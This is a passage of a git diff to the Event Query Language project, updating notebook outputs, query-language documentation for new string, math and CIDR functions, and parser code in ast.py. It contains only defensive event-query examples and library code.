131485997150000000\n", - " 34\n", - " 0\n", + " research\\researcher\n", " research\n", " researcher\n", " \n", " \n", " 6\n", " \"C:\\Windows\\system32\\cmd.exe\"\n", - " already_running\n", - " process_event\n", + " process\n", " 5746bd7e255dd6a8afa06f7c42c1ba41\n", - " 3\n", " explorer.exe\n", " C:\\Windows\\explorer.exe\n", " 2864\n", " 2460\n", " cmd.exe\n", " C:\\Windows\\System32\\cmd.exe\n", - " 39\n", + " create\n", " 131491838190000000\n", - " 39\n", - " 34\n", + " research\\researcher\n", " research\n", " researcher\n", " \n", @@ -314,23 +298,23 @@ "" ], "text/plain": [ - " command_line event_subtype_full event_type_full \\\n", - "0 already_running process_event \n", - "1 wininit.exe already_running process_event \n", - "2 winlogon.exe already_running process_event \n", - "3 C:\\Windows\\system32\\services.exe already_running process_event \n", - "4 C:\\Windows\\system32\\lsass.exe already_running process_event \n", - "5 C:\\Windows\\Explorer.EXE already_running process_event \n", - "6 \"C:\\Windows\\system32\\cmd.exe\" already_running process_event \n", - "\n", - " md5 opcode parent_process_name \\\n", - "0 3 System Idle Process \n", - "1 94355c28c1970635a31b3fe52eb7ceba 3 \n", - "2 1151b1baa6f350b1db6598e0fea7c457 3 \n", - "3 24acb7e5be595468e3b9aa488b9b4fcb 3 wininit.exe \n", - "4 7554a1b82b4a222fd4cc292abd38a558 3 wininit.exe \n", - "5 ac4c51eb24aa95b77f705ab159189e24 3 \n", - "6 5746bd7e255dd6a8afa06f7c42c1ba41 3 explorer.exe \n", + " command_line event_type \\\n", + "0 process \n", + "1 wininit.exe process \n", + "2 winlogon.exe process \n", + "3 C:\\Windows\\system32\\services.exe process \n", + "4 C:\\Windows\\system32\\lsass.exe process \n", + "5 C:\\Windows\\Explorer.EXE process \n", + "6 \"C:\\Windows\\system32\\cmd.exe\" process \n", + "\n", + " md5 parent_process_name \\\n", + "0 System Idle Process \n", + "1 94355c28c1970635a31b3fe52eb7ceba \n", + "2 1151b1baa6f350b1db6598e0fea7c457 \n", + "3 24acb7e5be595468e3b9aa488b9b4fcb wininit.exe \n", + "4 7554a1b82b4a222fd4cc292abd38a558 wininit.exe \n", + "5 ac4c51eb24aa95b77f705ab159189e24 \n", + "6 5746bd7e255dd6a8afa06f7c42c1ba41 explorer.exe \n", "\n", " parent_process_path pid ppid process_name \\\n", "0 4 System \n", @@ -341,23 +325,23 @@ "5 2460 3052 explorer.exe \n", "6 C:\\Windows\\explorer.exe 2864 2460 cmd.exe \n", "\n", - " process_path serial_event_id timestamp \\\n", - "0 2 131485996510000000 \n", - "1 C:\\Windows\\System32\\wininit.exe 5 131485996510000000 \n", - "2 C:\\Windows\\System32\\winlogon.exe 7 131485996510000000 \n", - "3 C:\\Windows\\System32\\services.exe 8 131485996520000000 \n", - "4 C:\\Windows\\System32\\lsass.exe 9 131485996520000000 \n", - "5 C:\\Windows\\explorer.exe 34 131485997150000000 \n", - "6 C:\\Windows\\System32\\cmd.exe 39 131491838190000000 \n", - "\n", - " unique_pid unique_ppid user_domain user_name \n", - "0 2 1 NT AUTHORITY SYSTEM \n", - "1 5 0 NT AUTHORITY SYSTEM \n", - "2 7 0 NT AUTHORITY SYSTEM \n", - "3 8 5 NT AUTHORITY SYSTEM \n", - "4 9 5 NT AUTHORITY SYSTEM \n", - "5 34 0 research researcher \n", - "6 39 34 research researcher " + " process_path subtype timestamp \\\n", + "0 create 131485996510000000 \n", + "1 C:\\Windows\\System32\\wininit.exe create 131485996510000000 \n", + "2 C:\\Windows\\System32\\winlogon.exe create 131485996510000000 \n", + "3 C:\\Windows\\System32\\services.exe create 131485996520000000 \n", + "4 C:\\Windows\\System32\\lsass.exe create 131485996520000000 \n", + "5 C:\\Windows\\explorer.exe create 131485997150000000 \n", + "6 C:\\Windows\\System32\\cmd.exe create 131491838190000000 \n", + "\n", + " user user_domain user_name \n", + "0 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "1 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "2 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "3 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "4 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "5 research\\researcher research researcher \n", + "6 research\\researcher research researcher " ] }, "execution_count": 2, @@ -414,18 +398,15 @@ " \n", " \n", " command_line\n", - " event_subtype_full\n", - " event_type_full\n", + " event_type\n", " md5\n", - " opcode\n", " pid\n", " ppid\n", " process_name\n", " process_path\n", - " serial_event_id\n", + " subtype\n", " timestamp\n", - " unique_pid\n", - " unique_ppid\n", + " user\n", " user_domain\n", " user_name\n", " \n", @@ -434,18 +415,15 @@ " \n", " 0\n", " C:\\Windows\\Explorer.EXE\n", - " already_running\n", - " process_event\n", + " process\n", " ac4c51eb24aa95b77f705ab159189e24\n", - " 3\n", " 2460\n", " 3052\n", " explorer.exe\n", " C:\\Windows\\explorer.exe\n", - " 34\n", + " create\n", " 131485997150000000\n", - " 34\n", - " 0\n", + " research\\researcher\n", " research\n", " researcher\n", " \n", @@ -454,17 +432,14 @@ "" ], "text/plain": [ - " command_line event_subtype_full event_type_full \\\n", - "0 C:\\Windows\\Explorer.EXE already_running process_event \n", - "\n", - " md5 opcode pid ppid process_name \\\n", - "0 ac4c51eb24aa95b77f705ab159189e24 3 2460 3052 explorer.exe \n", + " command_line event_type md5 pid \\\n", + "0 C:\\Windows\\Explorer.EXE process ac4c51eb24aa95b77f705ab159189e24 2460 \n", "\n", - " process_path serial_event_id timestamp unique_pid \\\n", - "0 C:\\Windows\\explorer.exe 34 131485997150000000 34 \n", + " ppid process_name process_path subtype timestamp \\\n", + "0 3052 explorer.exe C:\\Windows\\explorer.exe create 131485997150000000 \n", "\n", - " unique_ppid user_domain user_name \n", - "0 0 research researcher " + " user user_domain user_name \n", + "0 research\\researcher research researcher " ] }, "execution_count": 3, @@ -953,7 +928,7 @@ ], "source": [ "results = eql_search(\"data/normalized-T1117-AtomicRed-regsvr32.json\",\n", - " \"process where subtype='create' and process_name = 'regsvr32.exe'\")\n", + " \"process where subtype='create' and process_name = 'regsvr32.exe'\")\n", "results[['command_line']]" ] }, @@ -1442,8 +1417,8 @@ " \n", " \n", " 0\n", - " peace\n", - " [{u'share': u'2', u'surname': u'Dunant', u'id'...\n", + " medicine\n", + " [{'id': '293', 'firstname': 'Emil', 'surname':...\n", " 1901\n", " \n", " \n", @@ -1451,8 +1426,8 @@ "" ], "text/plain": [ - " category laureates year\n", - "0 peace [{u'share': u'2', u'surname': u'Dunant', u'id'... 1901" + " category laureates year\n", + "0 medicine [{'id': '293', 'firstname': 'Emil', 'surname':... 1901" ] }, "execution_count": 13, @@ -1502,38 +1477,38 @@ " \n", " \n", " 0\n", - " physics\n", - " [{u'share': u'2', u'motivation': u'\"for their ...\n", + " chemistry\n", + " [{'id': '261', 'firstname': 'Bruce', 'surname'...\n", " 1984\n", " \n", " \n", " 1\n", - " chemistry\n", - " [{u'share': u'1', u'motivation': u'\"for his de...\n", + " economics\n", + " [{'id': '698', 'firstname': 'Richard', 'surnam...\n", " 1984\n", " \n", " \n", " 2\n", - " medicine\n", - " [{u'share': u'3', u'motivation': u'\"for theori...\n", + " literature\n", + " [{'id': '661', 'firstname': 'Jaroslav', 'surna...\n", " 1984\n", " \n", " \n", " 3\n", - " literature\n", - " [{u'share': u'1', u'motivation': u'\"for his po...\n", + " peace\n", + " [{'id': '546', 'firstname': 'Desmond', 'surnam...\n", " 1984\n", " \n", " \n", " 4\n", - " peace\n", - " [{u'share': u'1', u'surname': u'Tutu', u'id': ...\n", + " physics\n", + " [{'id': '124', 'firstname': 'Carlo', 'surname'...\n", " 1984\n", " \n", " \n", " 5\n", - " economics\n", - " [{u'share': u'1', u'motivation': u'\"for having...\n", + " medicine\n", + " [{'id': '429', 'firstname': 'Niels K.', 'surna...\n", " 1984\n", " \n", " \n", @@ -1542,12 +1517,12 @@ ], "text/plain": [ " category laureates year\n", - "0 physics [{u'share': u'2', u'motivation': u'\"for their ... 1984\n", - "1 chemistry [{u'share': u'1', u'motivation': u'\"for his de... 1984\n", - "2 medicine [{u'share': u'3', u'motivation': u'\"for theori... 1984\n", - "3 literature [{u'share': u'1', u'motivation': u'\"for his po... 1984\n", - "4 peace [{u'share': u'1', u'surname': u'Tutu', u'id': ... 1984\n", - "5 economics [{u'share': u'1', u'motivation': u'\"for having... 1984" + "0 chemistry [{'id': '261', 'firstname': 'Bruce', 'surname'... 1984\n", + "1 economics [{'id': '698', 'firstname': 'Richard', 'surnam... 1984\n", + "2 literature [{'id': '661', 'firstname': 'Jaroslav', 'surna... 1984\n", + "3 peace [{'id': '546', 'firstname': 'Desmond', 'surnam... 1984\n", + "4 physics [{'id': '124', 'firstname': 'Carlo', 'surname'... 1984\n", + "5 medicine [{'id': '429', 'firstname': 'Niels K.', 'surna... 1984" ] }, "execution_count": 14, @@ -1597,39 +1572,15 @@ " \n", " \n", " 0\n", - " 1\n", - " 1916\n", - " 0.001695\n", - " \n", - " \n", - " 1\n", - " 2\n", - " 1918\n", - " 0.003390\n", - " \n", - " \n", - " 2\n", - " 3\n", - " 1914\n", - " 0.005085\n", - " \n", - " \n", - " 3\n", - " 4\n", - " 1919\n", - " 0.006780\n", - " \n", - " \n", - " 4\n", " 5\n", " 1901\n", - " 0.008475\n", + " 0.007740\n", " \n", " \n", - " 5\n", + " 1\n", " 6\n", " 1969\n", - " 0.010169\n", + " 0.009288\n", " \n", " \n", "\n", @@ -1637,12 +1588,8 @@ ], "text/plain": [ " count key percent\n", - "0 1 1916 0.001695\n", - "1 2 1918 0.003390\n", - "2 3 1914 0.005085\n", - "3 4 1919 0.006780\n", - "4 5 1901 0.008475\n", - "5 6 1969 0.010169" + "0 5 1901 0.007740\n", + "1 6 1969 0.009288" ] }, "execution_count": 15, @@ -1651,7 +1598,7 @@ } ], "source": [ - "eql_search(\"prize.jsonl\", \"| count year | sort year | unique count\")" + "eql_search(\"prize.jsonl\", \"| count year | sort key | unique count\")" ] }, { @@ -2070,21 +2017,21 @@ " \n", " \n", " 0\n", - " 35\n", + " 34\n", " reg.exe\n", - " 0.081776\n", + " 0.079812\n", " \n", " \n", " 1\n", - " 74\n", + " 73\n", " cmd.exe\n", - " 0.172897\n", + " 0.171362\n", " \n", " \n", " 2\n", " 255\n", " PING.EXE\n", - " 0.595794\n", + " 0.598592\n", " \n", " \n", "\n", @@ -2092,9 +2039,9 @@ ], "text/plain": [ " count key percent\n", - "0 35 reg.exe 0.081776\n", - "1 74 cmd.exe 0.172897\n", - "2 255 PING.EXE 0.595794" + "0 34 reg.exe 0.079812\n", + "1 73 cmd.exe 0.171362\n", + "2 255 PING.EXE 0.598592" ] }, "execution_count": 18, @@ -3053,21 +3000,21 @@ "metadata": { "celltoolbar": "Slideshow", "kernelspec": { - "display_name": "Python 2", + "display_name": "Python 3", "language": "python", - "name": "python2" + "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", - "version": 2 + "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", - "pygments_lexer": "ipython2", - "version": "2.7.15" + "pygments_lexer": "ipython3", + "version": "3.7.3" } }, "nbformat": 4, diff --git a/docs/index.rst b/docs/index.rst index 4fed9de..221bb17 100644 --- a/docs/index.rst +++ b/docs/index.rst @@ -30,7 +30,7 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av .. code-block:: console $ eql --version - eql 0.7.0 + eql 0.8 From there, try a :download:`sample json file <_static/example.json>` and test it with EQL. diff --git a/docs/links.rst b/docs/links.rst index 222e0ba..383925f 100644 --- a/docs/links.rst +++ b/docs/links.rst @@ -5,4 +5,6 @@ .. _json: https://en.wikipedia.org/wiki/JSON .. _unix head: https://en.wikipedia.org/wiki/Head_(Unix) .. _unix tail: https://en.wikipedia.org/wiki/Tail(Unix) -.. _tatsu: https://tatsu.readthedocs.io \ No newline at end of file +.. _tatsu: https://tatsu.readthedocs.io +.. _lark: https://lark-parser.readthedocs.io +.. _string slicing: https://docs.python.org/3/library/stdtypes.html#common-sequence-operations diff --git a/docs/query-guide/basic-syntax.rst b/docs/query-guide/basic-syntax.rst index 9620ae0..dffa8b6 100644 --- a/docs/query-guide/basic-syntax.rst +++ b/docs/query-guide/basic-syntax.rst @@ -35,6 +35,13 @@ Value comparisons < <= == != >= > +Mathematical operations + .. versionadded:: 0.8 + + .. code-block:: eql + + + - * / % + Wildcard matching .. code-block:: eql @@ -48,11 +55,19 @@ Function calls length(command_line) > 400 add(timestamp, 300) +Method syntax for concise function calls + .. code-block:: eql + + command_line:length() > 400 Lookups against static or dynamic values + .. versionadded:: 0.8 + Support for ``not in`` + .. code-block:: eql user_name in ("Administrator", "SYSTEM", "NETWORK SERVICE") + user_name not in ("Administrator", "SYSTEM", "NETWORK SERVICE") process_name in ("cmd.exe", parent_process_name) Strings @@ -66,7 +81,7 @@ for all characters except the quote character. "hello world" "hello world with 'substring'" - 'example \t of \n escaped \b characters \r etc. \f' + 'example \t of \n escaped \r characters' ?"String with literal 'slash' \ characters included" diff --git a/docs/query-guide/functions.rst b/docs/query-guide/functions.rst index 3903d4c..093a6ee 100644 --- a/docs/query-guide/functions.rst +++ b/docs/query-guide/functions.rst @@ -9,52 +9,80 @@ math, string manipulation or more sophisticated expressions to be expressed. .. function:: add(x, y) - Returns ``x + y`` + Returns ``x + y`` -.. function:: arrayContains(some_array, value) + .. versionchanged:: 0.8 + Added ``+`` operator directly. - Check if ``value`` is a member of the array ``some_array``. +.. function:: arrayContains(some_array, value [, ...]) - .. code-block:: eql + Check if ``value`` is a member of the array ``some_array``. - // {my_array: ["value1", "value2", "value3"]} + .. versionchanged:: 0.7 + Support for additional arguments. - arrayContains(my_array, "value2") // returns true - arrayContains(my_array, "value4") // returns false + .. code-block:: eql + + // {my_array: ["value1", "value2", "value3"]} + + arrayContains(my_array, "value2") // returns true + arrayContains(my_array, "value4") // returns false + arrayContains(my_array, "value3", "value4) // returns true + +.. function:: arrayCount(array, variable, expression) + + Count the number of matches in an array to an expression. + .. versionadded:: 0.7 + + .. code-block:: eql + + // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, + // {user: "guest", props: [{level: 1}]}] + + arrayCount(my_array, item, item.user == "root") // returns 1 + arrayCount(my_array, item, item.props[0].level == 1) // returns 2 + arrayCount(my_array, item, item.props[1].level == 4) // returns 0 + arrayCount(my_array, item, arrayCount(item.props, p, p.level == 2) == 1) // returns 1 .. function:: arraySearch(array, variable, expression) - Check if any member in the array matches an expression. - Unlike :func:`arrayContains`, this can search over nested structures in arrays, and supports - searching over arrays within arrays. + Check if any member in the array matches an expression. + Unlike :func:`arrayContains`, this can search over nested structures in arrays, and supports + searching over arrays within arrays. - .. code-block:: eql + .. code-block:: eql - // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, - // {user: "guest", props: [{level: 1}]}] + // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, + // {user: "guest", props: [{level: 1}]}] - arraySearch(my_array, item, item.user == "root") // returns true - arraySearch(my_array, item, item.props[0].level == 1) // returns true - arraySearch(my_array, item, item.props[1].level == 4) // returns false - arraySearch(my_array, item, arraySearch(item.props, p, p.level == 2)) // returns true + arraySearch(my_array, item, item.user == "root") // returns true + arraySearch(my_array, item, item.props[0].level == 1) // returns true + arraySearch(my_array, item, item.props[1].level == 4) // returns false + arraySearch(my_array, item, arraySearch(item.props, p, p.level == 2)) // returns true +.. function:: between(source, left, right [, greedy=false, case_sensitive=false]) + Extracts a substring from ``source`` that's also between ``left`` and ``right``. -.. function:: arrayCount(array, variable, expression) + :param greedy: Matches the longest string when set, similar to ``.*`` vs ``.*?``. + :param case_sensitive: Match case when searching for ``left`` and ``right```. - Count the number of matches in an array to an expression. + .. code-block:: eql + + between("welcome to event query language", " ", " ") // returns "to" + between("welcome to event query language", " ", " ", true) // returns "to event query" + +.. function:: cidrMatch(ip_address, cidr_block [, ...]) - .. code-block:: eql + Returns ``true`` if the source address matches any of the provided CIDR blocks. - // {my_array: [{user: "root", props: [{level: 1}, {level: 2}]}, - // {user: "guest", props: [{level: 1}]}] + .. versionchanged:: 0.8 - arrayCount(my_array, item, item.user == "root") // returns 1 - arrayCount(my_array, item, item.props[0].level == 1) // returns 2 - arrayCount(my_array, item, item.props[1].level == 4) // returns 0 - arrayCount(my_array, item, arrayCount(item.props, p, p.level == 2) == 1) // returns 1 + .. code-block:: eql + // ip_address = "192.168.152.12" + cidrMatch(ip_address, "10.0.0.0/8", "192.168.0.0/16") // returns true .. function:: concat(...) @@ -62,34 +90,69 @@ math, string manipulation or more sophisticated expressions to be expressed. .. code-block:: eql - concat("Process ", process_name, " executed with pid ", pid) + concat("Process ", process_name, " executed with pid ", pid) .. function:: divide(m, n) Return ``m / n`` + .. versionchanged:: 0.8 + Added ``/`` operator directly. + .. function:: endsWith(x, y) Checks if the string ``x`` ends with the substring ``y``. + +.. function:: indexOf(source, substring [, start=0]) + + Find the first position (zero-indexed) of a string where a substring is found. + If ``start`` is provided, then this will find the first occurrence at or after the start position. + + .. code-block:: eql + + indexOf("some-subdomain.another-subdomain.com", ".") // returns 14 + indexOf("some-subdomain.another-subdomain.com", ".", 14) // returns 14 + indexOf("some-subdomain.another-subdomain.com", ".", 15) // returns 32 + + .. function:: length(s) Returns the length of a string. Non-string values return 0. +.. function:: match(source, pattern [, ...]) + + Checks if multiple regular expressions are matched against a source string. + + .. code-block:: eql + + match("event query language", ?"[a-z]+ [a-z]+ [a-z]") // returns true + .. function:: modulo(m, n) Performs the `modulo`_ operator and returns the remainder of ``m / n``. + .. versionchanged:: 0.8 + Added ``%`` operator directly. + .. function:: multiply(x, y) Returns ``x * y`` -.. function:: number(s[, base]) + .. versionchanged:: 0.8 + Added ``*`` operator directly. + +.. function:: number(s [, base=10]) - :param: base: The `base` of a number. Default value is 10 if not provided. + :param number base: The `base`_ of a number. Returns a number constructed from the string ``s``. + .. code-block:: eql + + number("1337") // returns 1337 + number("0xdeadbeef", 16) // 3735928559 + .. function:: startsWith(x, y) Checks if the string ``x`` starts with the string ``y``. @@ -102,11 +165,26 @@ math, string manipulation or more sophisticated expressions to be expressed. Returns true if ``b`` is a substring of ``a`` +.. function:: substring(source [, start, end]) + + Extracts a substring between from another string between ``start`` and ``end``. + Like other EQL functions, ``start`` and ``end`` are zero-indexed positions in the string. + Behavior is similar to Python's `string slicing`_ (``source[start:end]``), and negative offsets are supported. + + .. code-block:: eql + + substring("event query language", 0, 5) // returns "event" + substring("event query language", 0, length("event")) // returns "event" + substring("event query language", 6, 11) // returns "query" + substring("event query language", -8) // returns "language" + substring("event query language", -length("language")) // returns "language" + substring("event query language", -5, -1)) // returns "guag" + .. function:: subtract(x, y) Returns ``x - y`` -.. function:: wildcard(value, wildcard, [, ... ]) +.. function:: wildcard(value, wildcard [, ... ]) Compare a value to a list of wildcards. Returns true if any of them match. For example, the following two expressions are equivalent. @@ -115,4 +193,22 @@ math, string manipulation or more sophisticated expressions to be expressed. command_line == "* create *" or command_line == "* config *" or command_line == "* start *" - wildcard(command_line, "* create *", "* config *", "* start *") \ No newline at end of file + wildcard(command_line, "* create *", "* config *", "* start *") + +Methods +------- +Calling functions with values returned from other functions can often be difficult to read +for complex expressions. EQL also provides an alternative method syntax that flows more +naturally from left to right. + +For instance, the expression: + +.. code-block:: eql + + length(between(command_line, "-enc ", " ")) > 500 + +is equivalent to the method syntax: + +.. code-block:: eql + + command_line:between(command_line, "-enc ", " "):length() > 500 \ No newline at end of file diff --git a/docs/query-guide/grammar.rst b/docs/query-guide/grammar.rst index 83e96d3..f50de5d 100644 --- a/docs/query-guide/grammar.rst +++ b/docs/query-guide/grammar.rst @@ -5,10 +5,10 @@ Grammar ============= -An external dependency for EQL is the Python library `Tatsu`_. -Tatsu generates a parser generator for the below grammar, which EQL uses to parse queries. +An external dependency for EQL is the Python library `Lark`_. +Lark generates a parser generator for the below grammar, which EQL uses to parse queries. -.. literalinclude:: ../../eql/etc/eql.ebnf +.. literalinclude:: ../../eql/etc/eql.g diff --git a/docs/query-guide/implementation.rst b/docs/query-guide/implementation.rst index 2c59dc5..7e5034c 100644 --- a/docs/query-guide/implementation.rst +++ b/docs/query-guide/implementation.rst @@ -21,7 +21,7 @@ The state changes are described for the per-user ``sequence`` and enumeration e .. code-block:: eql - sequence with by user_name + sequence by user_name [process where process_name == "whoami"] [process where process_name == "hostname"] [process where process_name == "ifconfig"] diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index 42241cb..17fcaff 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -28,8 +28,9 @@ Count the number of times each value occurs process where true | count process_name // results look like - // {"count": 100, "key": "cmd.exe", "percent": .4} - // {"count": 50, "key": "powershell.exe", "percent": .2} + // {"count": 100, "key": "cmd.exe", "percent": 0.5} + // {"count": 50, "key": "powershell.exe", "percent": 0.25} + // {"count": 50, "key": "net.exe", "percent": 0.25} Count the number of times a set of values occur @@ -38,8 +39,9 @@ Count the number of times a set of values occur process where true | count parent_process_name, process_name // results look like - // {"count": 100, "key": ["explorer.exe", "cmd.exe", "percent": .4} - // {"count": 100, "key": ["cmd.exe", "cmd.exe", "percent": .4} + // {"count": 100, "key": ["explorer.exe", "cmd.exe"], "percent": 0.5} + // {"count": 50, "key": ["explorer.exe", "powershell.exe"], "percent": 0.25} + // {"count": 50, "key": ["cmd.exe", "net.exe"], "percent": 0.25} ``unique`` diff --git a/docs/query-guide/sequences.rst b/docs/query-guide/sequences.rst index b985734..339fbf4 100644 --- a/docs/query-guide/sequences.rst +++ b/docs/query-guide/sequences.rst @@ -55,6 +55,7 @@ by moving ``by user_name`` to the top of the query. [ file where file_name == "*.exe"] by file_path [ process where true] by process_path + Managing State -------------- Occasionally, a ``sequence`` needs to carefully manage and expire state. Sequences are valid @@ -69,7 +70,7 @@ For instance, if ``whoami.exe`` executed from a batch file, matching ppid of ``w can only be done while the parent process is alive. As a result, the sequence is valid ``until`` the matching termination event occurs. -.. code-block::eql +.. code-block:: eql sequence [ process where process_name == "cmd.exe" and command_line == "* *.bat*" and event_subtype_full == "creation_event"] by pid diff --git a/docs/resources.rst b/docs/resources.rst index 6576204..88432d8 100644 --- a/docs/resources.rst +++ b/docs/resources.rst @@ -5,6 +5,9 @@ Resources Blogs ^^^^^ +* `EQL Threat Hunting `__ +* `Ransomware, interrupted: Sodinokibi and the supply chain `__ +* `Detecting Adversary Tradecraft with Image Load Event Logging and EQL `__ * `EQL's Highway to Shell `__ * `Getting Started with EQL `__ * `EQL For the Masses `__ @@ -13,16 +16,16 @@ Blogs Presentations ^^^^^^^^^^^^^ -* BlackHat 2019: `Fantastic Red-Team Attacks and How to Find Them `__ -* BSIDES SATX 2019: `The Hunter Games: How to Find the Adversary with EQL `__ -* Circle City Con 2019: `The Hunter Games: How to Find the Adversary with EQL `__ +* BSides DFW 2019: ATT&CKing Koadic with EQL (`slides `__) +* BlackHat 2019: `Fantastic Red-Team Attacks and How to Find Them `__ (`slides `__, `blog `__) +* BSides SATX 2019: `The Hunter Games: How to Find the Adversary with EQL `__ (`slides `__) +* Circle City Con 2019: `The Hunter Games: How to Find the Adversary with EQL `__ (`slides `__) * Atomic Friday: `Endgame on EQL `__ (`slides `__, `notebook <_static/eql-crash-course.ipynb>`__) -* MITRE ATT&CK™con: `From Technique to Detection `__ - +* MITRE ATT&CKcon: `From Technique to Detection `__ Additional Resources ^^^^^^^^^^^^^^^^^^^^ -* Event Query Language (`docs `__, `code `__) +* Event Query Language (`docs `__, `code `__, `twitter `__) * EQL Analytics Library (`docs `__, `code `__) diff --git a/eql/__init__.py b/eql/__init__.py index 841e021..4802532 100644 --- a/eql/__init__.py +++ b/eql/__init__.py @@ -42,6 +42,7 @@ parse_literal, parse_query, strict_field_schema, + extract_query_terms, ) from .schema import Schema from .transpilers import ( @@ -52,6 +53,7 @@ ) from .utils import ( ParserConfig, + get_output_types, is_stateful, load_dump, load_extensions, @@ -64,7 +66,7 @@ Walker, ) -__version__ = '0.7.0' +__version__ = '0.8.2' __all__ = ( "__version__", "AnalyticOutput", @@ -91,9 +93,11 @@ "allow_enum_fields", "functions", "get_engine", + "get_output_types", "get_post_processor", "get_preprocessor", "get_reducer", + "extract_query_terms", "ignore_missing_fields", "ignore_missing_functions", "is_stateful", diff --git a/eql/ast.py b/eql/ast.py index 5f0a803..9cc103b 100644 --- a/eql/ast.py +++ b/eql/ast.py @@ -4,10 +4,9 @@ import datetime import re from collections import OrderedDict -from operator import lt, le, eq, ne, ge, gt +from operator import lt, le, eq, ne, ge, gt, mul, truediv, mod, add, sub from string import Template -from .functions import get_function from .signatures import SignatureMixin from .types import STRING, BOOLEAN, NUMBER, NULL, PRIMITIVES from .utils import to_unicode, is_string, is_number, ParserConfig @@ -36,6 +35,7 @@ "Or", "Not", "FunctionCall", + "MathOperation", # queries "EventQuery", @@ -89,7 +89,7 @@ def __ne__(self, other): """Check if two ASTs are not equivalent.""" return not self == other - def render(self, precedence=None): + def render(self, precedence=None, **kwargs): """Render the AST in the target language.""" if not self.template: raise NotImplementedError() @@ -98,10 +98,10 @@ def render(self, precedence=None): for name, value in self.iter_slots(): if isinstance(value, (list, tuple)): delim = self.delims[name] - value = [v.render(self.precedence) if isinstance(v, BaseNode) else v for v in value] + value = [v.render(self.precedence, **kwargs) if isinstance(v, BaseNode) else v for v in value] value = delim.join(v for v in value) elif isinstance(value, BaseNode): - value = value.render(self.precedence) + value = value.render(self.precedence, **kwargs) dicted[name] = value return self.template.substitute(dicted) @@ -143,9 +143,9 @@ def _render(self): # Render the template if defined return super(EqlNode, self).render() - def render(self, precedence=None): + def render(self, precedence=None, **kwargs): """Render an EQL node and add parentheses to support orders of operation.""" - rendered = self._render() + rendered = self._render(**kwargs) if precedence is not None and self.precedence is not None and self.precedence > precedence: return '({})'.format(rendered) return rendered @@ -391,12 +391,12 @@ def _render(self): class FunctionCall(Expression): """A call into a user-defined function by name and a list of arguments.""" - __slots__ = 'name', 'arguments' + __slots__ = 'name', 'arguments', 'as_method' precedence = Literal.precedence + 1 template = Template('$name($arguments)') delims = {'arguments': ', '} - def __init__(self, name, arguments): + def __init__(self, name, arguments, as_method=False): """Call the function by name. :param str name: The name of the user-defined function @@ -404,6 +404,7 @@ def __init__(self, name, arguments): """ self.name = name self.arguments = arguments or [] + self.as_method = as_method @property def callback(self): @@ -427,13 +428,23 @@ def optimize(self): except NotImplementedError: pass - return FunctionCall(self.name, arguments) + return FunctionCall(self.name, arguments, self.as_method) + + def _render(self): + """Determine the precedence by checking if it's called as a method.""" + if self.as_method: + return '{base}:{name}({remaining})'.format( + base=self.arguments[0].render(self.precedence), name=self.name, + remaining=", ".join(arg.render(self.precedence) for arg in self.arguments[1:])) + + return super(FunctionCall, self)._render() def render(self, precedence=None): """Convert wildcards back to the short hand syntax.""" - if self.name == 'wildcard' and len(self.arguments) == 2 and isinstance(self.arguments[1], String): - lhs, rhs = self.arguments - return Comparison(lhs, Comparison.EQ, rhs).render(precedence) + if self.signature: + alternate_render = self.signature.alternate_render(self.arguments, precedence) + if alternate_render: + return alternate_render return super(FunctionCall, self).render() @@ -467,6 +478,67 @@ def __init__(self, query_type, query): self.query = query +class MathOperation(Expression): + """Mathematical operation between two numeric values.""" + + __slots__ = 'left', 'operator', 'right' + OPERATORS = ('*', '/', '%', '+', '-') + + op_lookup = {'*': mul, '/': truediv, '%': mod, '+': add, '-': sub} + func_lookup = {"*": "multiply", "+": "add", "-": "subtract", "%": "modulo", "/": "divide"} + + min_precedence = NamedSubquery.precedence + 1 + max_precedence = min_precedence + 1 + full_template = Template('$left $operator $right') + negative_template = Template('$operator$right') + + def __init__(self, left, operator, right): # type: (Expression, str, Expression) -> None + """Mathematical operation between two numeric values.""" + self.left = left + self.operator = operator + self.right = right + + def to_function_call(self): + """Convert a math operator to an EQL function call.""" + return FunctionCall(self.func_lookup[self.operator], [self.left, self.right]) + + @property + def precedence(self): + """Get the precedence depending on the operator.""" + if self.operator in "*/%": + return self.min_precedence + else: + return self.max_precedence + + def optimize(self): + """Evaluate literals when possible.""" + left = self.left.optimize() + right = self.right.optimize() + + if isinstance(left, Number) and isinstance(right, Number): + # don't divide by zero when optimizing, leave that to the target implementation + if not (right.value == 0 and self.operator in ("/", "%")): + return Number(self.func(left.value, right.value)) + + if isinstance(right, MathOperation) and right.left == Number(0): + # a +- b parses as a + (0 - b) should become a + -b + if self.operator in ("-", "+") and right.operator in ("-", "+"): + operator = "-" if (self.operator == "-") ^ (right.operator == "-") else "+" + return MathOperation(left, operator, right.right) + + return MathOperation(left, self.operator, right) + + @property + def template(self): + """Make the template dynamic.""" + return self.negative_template if self.left == Number(0) else self.full_template + + @property + def func(self): + """Get a callback function for the specific operator.""" + return self.op_lookup[self.operator] + + class Comparison(Expression): """Represents a comparison between two values, as in `` ``. @@ -477,7 +549,7 @@ class Comparison(Expression): LT, LE, EQ, NE, GE, GT = ('<', '<=', '==', '!=', '>=', '>') func_lookup = {LT: lt, LE: le, EQ: eq, NE: ne, GE: ge, GT: gt} - precedence = NamedSubquery.precedence + 1 + precedence = MathOperation.max_precedence + 1 template = Template('$left $comparator $right') def __init__(self, left, comparator, right): @@ -665,16 +737,17 @@ def synonym(self): """Get an equivalent node that does performs multiple comparisons with 'or' and '=='.""" return Or([Comparison(self.expression, Comparison.EQ, v) for v in self.container]) - def _render(self): + def _render(self, negate=False): values = [v.render() for v in self.container] expr = self.expression.render(self.precedence) + operator = 'not in' if negate else 'in' if len(self.container) > 3 and sum(len(v) for v in values) > 40: delim = ',\n' - return '{} in 